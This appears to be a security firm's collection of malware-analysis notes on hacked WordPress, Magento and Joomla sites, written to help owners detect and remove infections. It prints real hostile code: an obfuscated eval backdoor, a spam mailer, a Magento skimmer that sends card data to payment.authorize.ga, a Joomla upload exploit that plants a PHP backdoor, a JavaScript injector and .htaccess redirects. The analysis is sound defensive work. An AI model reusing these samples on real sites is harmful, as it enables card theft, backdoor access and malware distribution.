WordPress-specific malware is slightly different than generic PHP malware. Inside WordPress files, it can use WordPress API and WordPress database. This allows to create this kind of injections:

<?php eval(get_option("\x72\x65\x6e\x64\x65\x72")); ?>

It was found in WordPress theme files. The code executes the value of the "render" (deobfuscated) option from the WordPress wp_options table, which it extracts using the get_option WordPress API function

This piece of code can be used both as a backdoor (say to execute arbitrary code passed in a certain request parameter), or to inject a client-side malware (it was found right after the tag in theme files). We actually found the "render" option in the database, but by the time we began working on the site, that option had already been cleaned, so at this point we can\'t tell what exactly was there. If you find this malware and the original value of the render option on your site, please let us know at labs@sucuri.net

Here is a mailer script we recently found that appears to be designed to send spam emails.

These kind of scripts are pretty common, there are multiple variations but in most cases they are only designed to send spam. Accessing the file directly without passing a specific variable would cause it to just display a blank page which is used by spammers to hide the functionality of the script.

if ($_GET ['ch']) {
    echo "OK";
    exit ();
}

if($_POST['to'])
{
    $to = $_POST ['to'];
    $subject = stripslashes ( $_POST ['subj'] );
    $message = stripslashes ( $_POST ['mes'] );
    $headers = stripslashes ( $_POST ['headers'] );

    if (mail ( $to, $subject, $message, $headers )) {
        echo "Message sent successfully";
    } else {
        echo "An error occured";
    }
}

if (! $_POST['to'] && ! $_GET ['ch'] && count($_GET) > 0) {
    $arr = array (
        1 => 'a',
            2 => 'b',
            3 => 'c',
            4 => 'd',
            5 => 'e',
            6 => 'f',
            7 => 'g',
            8 => 'h',
            9 => 'i',
            10 => 'j',
            11 => 'k',
            12 => 'l',
            13 => 'm',
            14 => 'n',
            15 => 'o',
            16 => 'p',
            17 => 'q',
            18 => 'r',
            19 => 's',
            20 => 't',
            21 => 'u',
            22 => 'v',
            23 => 'w',
            24 => 'x',
            25 => 'y',
            26 => 'z',
            27 => '.',
            28 => '1',
            29 => '2',
            30 => '3',
            31 => '4',
            32 => '5',
            33 => '6',
            34 => '7',
            35 => '8',
            36 => '9',
            37 => '0'
    );

    $var = key ( $_GET );

    $var_arr = explode ( "-", $var );

    foreach ( $var_arr as $value ) {
        preg_match_all ( "~\d+~", $value, $matches );

        $value = implode ( "", $matches [0] );

        if ($value > sizeof ( $arr )) {
            for($i = $value; $i > sizeof ( $arr ); $i = $i - sizeof ( $arr )) {
                $value = $i;
            }

            $value -= sizeof ( $arr );
        }

        $string [.]= $arr [$value];
    }

    $link = $string [.] $_GET [$var];

    header (  "Location: http://{$link}" );

If you see it on your site, you are likely compromised.

We recently found another malicious script used to steal credit cards that appears to be injected into compromised websites running Magento, it appears to be sending the information to payment.authorize.ga which is a recently registered domain that mimics the Authorize.net payment gateway

The malware was found in file: ./app/code/core/Mage/Payment/Model/Method/Cc.php

$object = new Mage_Checkout_Block_Onepage_Billing;
        $address1 = $object->getQuote()->getBillingAddress();
        $data1 = $address1->getFirstname();
        $data2 = $address1->getLastname();
        $data3 = $address1->getStreet(1);
        $data5 = $address1->getCity();
        $data6 = $address1->getRegion();
        $data7 = $address1->getPostcode();
        $data8 = $address1->getCountry();
        $data9 = $address1->getTelephone();
        $data10 = $info->getCcNumber();
        $expyear = substr($info->getCcExpYear(), -2);
        $expmonth = $info->getCcExpMonth();
        if (strlen($expmonth) == 1) {
           $expmonth = '0'.$expmonth;
        };
        $data11 = $expmonth;
        $data12 = $expyear;
        $data13 = $info->getCcCid();
        $data15 = "infectedwebsite.com";
        $data16 = Mage::getSingleton('checkout/session')->getQuote()->getBillingAddress()->getEmail();
     $ctx2 = stream_context_create(array(
        'http' => array(
            'timeout' => 3
            )
        )
    );
        $tesco = "$data10|$data13|$data11$data12|$data1 $data2|$data3|$data5|$data6|$data7|$data8|$data16|$data9|$data15";
        $ordser = @file_get_contents("http://payment.authorize.ga/uk.html?speciality=$tesco", -1, $ctx2);

We regularly detect malware that targets Magento payment modules:

• Phishing 2.0 – Credit Card Redirection on Compromised Sites
• Impacts of a Hack on a Magento Ecommerce Website
• Magento Platform Targeted By Credit Card Scrapers

In this case, the entire code from the $object all the way to the last line ending with $ctx2); should be removed from the Cc.php file in order to stop the credit card details from being sent to the remote website.

Other files could also contain this malicious code or even different code that will re-add the injection back in the site even after the above is removed, so just contact us if you have any questions and we will be happy to inspect the website.

Just a reminder that your hacked site may be used to anonymously hack third-party sites.

This Joomla com_Myblog exploit script was found on one hacked site:

$uploadfile="tq.php.jpg";
$ch = curl_init("http://<third-party-site.com>/index.php?option=com_myblog&task=ajaxupload");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

This code uploads a PHP backdoor disguised as a JPG file using a vulnerability in a really old (and it looks like, not longer supported) My Blog Joomla component.

Still some webmaster use it on Joomla 1.5.x sites and this exploit has proven to be efficient as you can read in this blogpost. This blogpost also provides a quick fix for this vulnerable component. Apply it if you still use legacy versions of this component, but also consider upgrading your site to use software that is up to date (Both Joomla and third-party components, plugins and templates)

Recently, we\'re seeing an increasing visitorTracker malware wave.

Moreover, there are lot of corrupted infections out there, breaking the infected sites. Right now, the malicious code starts and ends with visitorTracker comment tag and lot of site\'s legitimate JavaScript files are injected with the malicious code as well. The outcome - in case of successful (not broken) infection - is spam content served for the visitors using mobile devices.

Part of the malicious injection:

var visitortrackerin = setInterval(function(){
    if(document.body != null && typeof document.body != "undefined"){
        clearInterval(visitortrackerin);
        if(typeof window["globalvisitor"] == "undefined"){
            window["globalvisitor"] = 1;
            var isIE = visitortrackerde();
            var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc.";
            if(visitorTracker_ isMob ()){
              var visitortrackervs = document.createElement("script"); visitortrackervs.src = "http://test.com/components/com_banners/models/main_configuration/watch.php?mob=1"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
            }else{
                if((isIE && !isChrome && !visitorTracker_isMob())){
                    var visitortrackervs = document [.] createElement("script"); visitortrackervs.src = "http://test.com/components/com_banners/models/main_configuration/watch.php"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
                } 
            }
        }
        visitortracksdel();
    }

As mentioned, the infection is very buggy and often removed single-quotes from legitimate files which corrupts the site completely. Affects plugins, themes and even core files of WordPress and Joomla. The solution is to restore files from a clean backup.

We are finding many sites infected with malicious redirects inside the .htaccess file, to secondtds.mooo[.]com/go.php?sid=3. That domain is a TDS (traffic controller) which redirects visitors to another website pushing your browser to download this malware: https://www.virustotal.com/en/file/0b6eab15961f92da95a0a4b0d55fee8a8bd0eb39fec1027aa43575802d7a199e/analysis/1441223870/

The redirect chain is:

secondtds.mooo[.]com
downserver.ignorelist[.]com
pastdownload[.]com
stds1new.computersoftwarelive[.]com
download.pastdownload[.]com
files.september-master-3[.]xyz

Here is the .htaccess content:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} go.mail.* [OR]
RewriteCond %{HTTP_REFERER}  .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER}  .*bing.* [OR]
RewriteCond %{HTTP_REFERER}  .*goto.* [OR]
RewriteCond %{HTTP_REFERER}  .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER}  .*nigma.* [OR]
RewriteCond %{HTTP_REFERER}  .*mamma.* [OR]
..
RewriteCond %{HTTP_REFERER}  .*aport.* [OR]
RewriteCond %{HTTP_REFERER}  .*search.* [OR]
RewriteCond %{HTTP_REFERER}  .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER}  .*dogpile.*
RewriteRule ^(.*)$ http://secondtds[.]mooo.com[/]go.php?sid=2 [R=301,L]

The attack is quite buggy and doesn't check whether a site is already infected, thus multiple identical redirect rules in the same .htaccess file.

If you find this code, remove it right away!

We are seeing a large amount of sites with a malscript from gccanada.com injected into them. The malware redirects visitors to searchmagnified.com, which redirects them to freeresultsguide.com.That\'s the code being added to the hacked sites:

< script type='text/javascript' src="http://gccanada[.]com/jquery[.]js"

What is so bad about it? The final domain \'freeresultsguide.com\', pushes you to buy a fake anti virus software with some annoying messages and warnings:

Important security message. Please call the number provided asap to get your computer fixed. You have a virus!

If you see this gcanada code on your site, it means you got hacked. It is not from the Government of Canada, as they want you to think.